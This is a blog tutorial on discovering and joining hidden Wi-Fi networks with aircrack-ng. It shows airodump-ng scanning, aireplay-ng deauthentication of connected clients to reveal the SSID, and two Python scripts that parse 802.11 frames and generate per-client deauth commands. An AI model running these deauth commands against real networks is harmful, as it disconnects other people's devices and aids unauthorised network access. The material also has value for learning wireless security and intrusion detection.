
Discover And Connect To Hidden Networks Using aircrack-ng

Welcome to this blog. In the previous blog, we learned about the de-authentication attack, and in this blog, we will look at one of the most useful applications of the de-authentication attack, i.e., discovering and connecting to hidden networks.

Requirements

  1. Kali Linux (To know how to install Kali Linux click here)

  2. A wireless adapter that supports monitor mode and packet injection.


Introduction

Let us suppose you want to connect to an open wifi network near you, but that wifi is hidden. What can you do about it? How will you discover it? This blog answers each of these questions in detail.

What is hidden Wifi?

Well, the simplest answer is: a hidden Wi-Fi network is one that does not show up in your device's list of available networks. In more technical terms, the access point still sends beacon frames, but the SSID element in those beacons is blank (either empty or filled with null bytes), so the ESSID, the human-readable network name, is not broadcast. The beacons still carry the BSSID, which is the access point's MAC address, and the ESSID is still sent in the clear whenever a client probes for the network by name or associates with it. In this blog, we will use the BSSID to determine the ESSID and then connect to the network.
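To make the frame-level picture concrete, here is an added example (not code from the original post) that decodes the SSID information element from 802.11 management frames: it classifies a beacon the way airodump-ng does (name, or <length: N> when the field is blanked), counts deauthentication frames per BSSID, and recovers the ESSID from the association request and probe response exchanged when a client reconnects. All frames are constructed in the script; the MAC addresses, the name "HiddenNet" and the deauth reason code are assumptions for the sample.

```python
# Added example (not from the original post): a minimal 802.11 management-frame
# parser showing why a hidden AP still leaks its BSSID, and how the ESSID turns up
# in the frames exchanged when a client (re)associates after a deauth.
# Only the SSID information element (IE id 0) is decoded. All frames below are
# constructed samples; the MAC addresses and the name "HiddenNet" are made up.
from typing import Dict, Iterable, Optional

BROADCAST = bytes.fromhex("ffffffffffff")

# Management-frame subtypes (frame type 0) and the size of the fixed fields that
# precede the information elements in each frame body.
ASSOC_REQ, REASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON, DEAUTH = 0, 2, 4, 5, 8, 12
FIXED_FIELDS = {
    ASSOC_REQ: 4,     # capability(2) + listen interval(2)
    REASSOC_REQ: 10,  # capability(2) + listen interval(2) + current AP address(6)
    PROBE_REQ: 0,     # IEs start immediately
    PROBE_RESP: 12,   # timestamp(8) + beacon interval(2) + capability(2)
    BEACON: 12,       # timestamp(8) + beacon interval(2) + capability(2)
    DEAUTH: 2,        # reason code(2)
}
IE_SSID = 0


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes) -> bytes:
    """24-byte MAC header (frame control, duration, 3 addresses, sequence control) + body."""
    header = bytes([subtype << 4, 0]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"
    return header + body


def with_ssid(subtype: int, ssid: bytes) -> bytes:
    """Frame body: zeroed fixed fields followed by a single SSID IE."""
    return b"\x00" * FIXED_FIELDS[subtype] + bytes([IE_SSID, len(ssid)]) + ssid


def parse_ies(body: bytes) -> Dict[int, bytes]:
    ies: Dict[int, bytes] = {}
    i = 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def parse_mgmt(frame: bytes) -> Optional[dict]:
    """Addresses and SSID IE of a management frame; None for data/control frames."""
    fc = frame[0]
    subtype = fc >> 4
    if (fc >> 2) & 0x3 != 0 or subtype not in FIXED_FIELDS:
        return None
    ies = parse_ies(frame[24 + FIXED_FIELDS[subtype]:])
    return {"subtype": subtype, "da": frame[4:10], "sa": frame[10:16],
            "bssid": frame[16:22], "ssid": ies.get(IE_SSID)}


def beacon_ssid_state(ssid: Optional[bytes]) -> str:
    """What airodump-ng prints for a beacon: the name, or <length: N> when it is blanked."""
    if not ssid or not any(ssid):          # missing, empty, or all NUL bytes
        return f"<length: {len(ssid or b'')}>"
    return ssid.decode("utf-8", "replace")


def track_networks(frames: Iterable[bytes]) -> Dict[str, dict]:
    """Per-BSSID state: beacon SSID field, deauth count, associated clients, and the
    ESSID once a probe/association frame carries it in the clear."""
    nets: Dict[str, dict] = {}
    for raw in frames:
        f = parse_mgmt(raw)
        if f is None or f["bssid"] == BROADCAST:   # skip wildcard probe requests
            continue
        net = nets.setdefault(mac_str(f["bssid"]),
                              {"beacon": None, "essid": None, "clients": set(), "deauths": 0})
        if f["subtype"] == BEACON:
            net["beacon"] = beacon_ssid_state(f["ssid"])
            continue
        if f["subtype"] == DEAUTH:
            net["deauths"] += 1
            continue
        if f["subtype"] in (ASSOC_REQ, REASSOC_REQ):
            net["clients"].add(mac_str(f["sa"]))
        if f["ssid"] and any(f["ssid"]):       # a real name, not the blanked one
            net["essid"] = f["ssid"].decode("utf-8", "replace")
    return nets


AP = bytes.fromhex("001122334455")       # constructed AP MAC
CLIENT = bytes.fromhex("aabbccddeeff")   # constructed client MAC
HIDDEN_SSID = b"HiddenNet"               # 9 bytes, made up

# Constructed capture: the AP beacons nine NUL bytes (airodump-ng shows <length: 9>),
# a deauth (reason code 7 chosen for the sample) hits the client, and the client
# re-associates, naming the network; the AP's probe response repeats the name.
SAMPLE_CAPTURE = [
    build_frame(BEACON, BROADCAST, AP, AP, with_ssid(BEACON, b"\x00" * len(HIDDEN_SSID))),
    build_frame(DEAUTH, CLIENT, AP, AP, (7).to_bytes(2, "little")),
    build_frame(ASSOC_REQ, AP, CLIENT, AP, with_ssid(ASSOC_REQ, HIDDEN_SSID)),
    build_frame(PROBE_RESP, CLIENT, AP, AP, with_ssid(PROBE_RESP, HIDDEN_SSID)),
]


def recovered_networks(frames: Iterable[bytes] = SAMPLE_CAPTURE) -> Dict[str, dict]:
    return track_networks(frames)


if __name__ == "__main__":
    for bssid, net in recovered_networks().items():
        print(f"{bssid}  beacon={net['beacon']}  essid={net['essid']}  "
              f"clients={sorted(net['clients'])}  deauths={net['deauths']}")
```

The same logic is also the defender's view: a BSSID whose beacons say <length: N> followed by a burst of deauthentication frames and a fresh association is exactly the pattern a wireless IDS flags.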

Setup

  1. Make sure your wireless adapter is in monitor mode. To know how to put your card in monitor mode, check this blog.

  2. You must have aircrack-ng installed. On Kali Linux it is in the default repositories, so install the aircrack-ng package with apt if it is missing. aircrack-ng is a suite: the two tools used below, airodump-ng (capture) and aireplay-ng (de-authentication), come with it.

Discovering The Name Of The Wi-Fi

From the blog about packet sniffing, we know that every access point announces its existence by sending beacon frames. A hidden network still sends those beacons, and they still carry its BSSID; only the name field is blanked. Starting from the BSSID alone, we will recover the ESSID (the name of the Wi-Fi). Follow the steps below.


Step 1: Run airodump-ng on the monitor-mode interface with no filter, so that it lists every access point in range together with its BSSID and channel.

Discovering hidden networks in kali linux

As we can see, the name of the Wi-Fi is hidden. <length: 9> is how airodump-ng shows a beacon whose SSID field is blanked: the number is the length of that field, so the name is 9 characters long. If the access point sends an empty SSID element instead, airodump-ng shows <length: 0> and the length of the name is unknown.

Step 2: To get more detailed information about this Wi-Fi, run airodump-ng again, filtered to this network's BSSID and locked to its channel. Locking the channel matters: otherwise airodump-ng keeps hopping between channels and can miss the frames we are waiting for.

You should see something like this:


Discovering connected clients

The highlighted STATION section lists the clients associated with this BSSID; each line shows the MAC address of one connected device. If no clients are connected, the de-authentication trick in the next step has nothing to work with, and you have to wait for a device to join (or to probe for the network by name).

Step 3: Now we will use the de-authentication attack which we learnt in the previous blog. When we knock one of the devices off the network for a moment, it reconnects on its own, and the frames it sends to do so (probe requests and the association request) carry the network name in the clear; the access point's probe response carries it too. airodump-ng, still running from Step 2, picks the name out of those frames and replaces <length: 9> with the ESSID.

To de-authenticate the client, use aireplay-ng in de-authentication mode against the BSSID and the client MAC address from Step 2. A handful of deauth frames is enough; there is no need to flood the network.

NOTE: Make sure the airodump-ng from Step 2 is still running while you execute this in a separate terminal; the name shows up in airodump-ng's output, not in aireplay-ng's.

Now you should see something like this:

how to discover a hidden network.

As you can see, we have successfully captured the ESSID of the router and can now connect to it.
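The three steps above are easy to do by eye for one network, but when airodump-ng is writing its CSV output it is quicker to let a script pick out the hidden networks, their connected clients, and the commands for Steps 2 and 3. The following is an added example, not code from the original post: it parses airodump-ng's CSV layout (AP table, blank line, STATION table), reports each hidden BSSID with the ESSID length from the ID-length column, lists the clients to deauth, and also checks whether any nearby device has already probed for a name of the right length, which can reveal the ESSID with no deauth at all. The CSV contents, the MAC addresses and the interface name wlan0mon are constructed for the example; the airodump-ng and aireplay-ng options it prints (--bssid, -c, --deauth, -a, -c) are the tools' real ones.

```python
# Added example (not from the original post): triage an airodump-ng CSV dump
# (the file written by -w) to list hidden networks, the clients associated with
# each, and the follow-up commands for the targeted capture and the deauth.
# SAMPLE_CSV is constructed in airodump-ng's CSV layout; the MACs, timestamps and
# the monitor interface name wlan0mon are assumptions.
import csv
import io
from typing import List, Tuple

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2023-02-06 10:00:00, 2023-02-06 10:05:00,  6,  54, OPN, , , -40,  120, 0,   0.  0.  0.  0,   9, , 
66:77:88:99:AA:BB, 2023-02-06 10:00:01, 2023-02-06 10:05:00,  1,  54, WPA2, CCMP, PSK, -60,   90, 0,   0.  0.  0.  0,  10, CoffeeShop, 
CC:DD:EE:FF:00:11, 2023-02-06 10:00:02, 2023-02-06 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,   30, 0,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2023-02-06 10:00:10, 2023-02-06 10:05:00, -50,  300, 00:11:22:33:44:55, 
12:34:56:78:9A:BC, 2023-02-06 10:01:00, 2023-02-06 10:05:00, -55,   20, (not associated), CoffeeShop
DE:AD:BE:EF:00:01, 2023-02-06 10:02:00, 2023-02-06 10:05:00, -65,    5, (not associated), HiddenNet
"""


def _rows(section: str, header_first: str) -> List[List[str]]:
    """CSV rows of one section with whitespace stripped, header and blank rows dropped."""
    out = []
    for row in csv.reader(io.StringIO(section)):
        row = [field.strip() for field in row]
        if row and row[0] and row[0] != header_first:
            out.append(row)
    return out


def parse_airodump_csv(text: str) -> Tuple[List[dict], List[dict]]:
    """Split the dump into its AP table and STATION table (separated by a blank line)."""
    ap_part, sta_part = text.split("\n\n", 1)
    aps = [{"bssid": r[0], "channel": r[3], "privacy": r[5],
            "id_length": int(r[12]), "essid": r[13].replace("\x00", "").strip()}
           for r in _rows(ap_part, "BSSID") if len(r) >= 14]
    stations = [{"mac": r[0], "bssid": r[5], "probed": [p for p in r[6:] if p]}
                for r in _rows(sta_part, "Station MAC") if len(r) >= 6]
    return aps, stations


def hidden_network_report(text: str = SAMPLE_CSV, iface: str = "wlan0mon") -> List[dict]:
    """One entry per hidden AP: what we know, who is connected, and what to run next."""
    aps, stations = parse_airodump_csv(text)
    visible = {ap["essid"] for ap in aps if ap["essid"]}
    report = []
    for ap in aps:
        if ap["essid"]:                     # name already present in the beacons
            continue
        clients = [s["mac"] for s in stations if s["bssid"] == ap["bssid"]]
        # Stations probing for a name of the right length may reveal the ESSID without
        # any deauth; treat such names as candidates to confirm, not as the answer.
        candidates = sorted({p for s in stations for p in s["probed"]
                             if p not in visible and ap["id_length"]
                             and len(p.encode()) == ap["id_length"]})
        report.append({
            "bssid": ap["bssid"], "channel": ap["channel"], "privacy": ap["privacy"],
            "essid_length": ap["id_length"] or None,   # 0 means <length: 0>, i.e. unknown
            "clients": clients, "candidate_names": candidates,
            "watch_cmd": f"airodump-ng --bssid {ap['bssid']} -c {ap['channel']} {iface}",
            "deauth_cmds": [f"aireplay-ng --deauth 4 -a {ap['bssid']} -c {c} {iface}"
                            for c in clients],
        })
    return report


if __name__ == "__main__":
    for entry in hidden_network_report():
        print(entry["bssid"], f"len={entry['essid_length']}", entry["privacy"],
              "clients:", entry["clients"], "candidates:", entry["candidate_names"])
        print("  ", entry["watch_cmd"])
        for cmd in entry["deauth_cmds"]:
            print("  ", cmd)
```

Run it against a real dump with hidden_network_report(open("capture-01.csv").read()); a hidden AP with no clients and no candidate names is one you simply have to keep watching.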

How to Connect To Hidden Networks in Kali Linux?

To connect to a hidden Wi-Fi in Kali Linux follow these steps:

Step 1: First, put your Wi-Fi adapter back into managed mode (stopping monitor mode, or unplugging and reconnecting the adapter, does this).

Step 2: Open Wi-Fi setting by clicking on the top right corner of the screen.

Step 3: Click on the three dots at the top right corner of the screen.


How to connect to a hidden Wi-Fi

Step 4: Click on Connect to Hidden Network button.

Step 5: Enter the network name and then choose the security type from the dropdown. To check which type of security the router uses, look at the ENC column in airodump-ng (OPN means an open network).

Connecting to hidden Wi-Fi

But what if the Wi-Fi uses WPA or WPA2-Personal encryption? How will you break it? Well, that's a blog for another day.

See ya in the next blog.

HAPPY HACKING :)
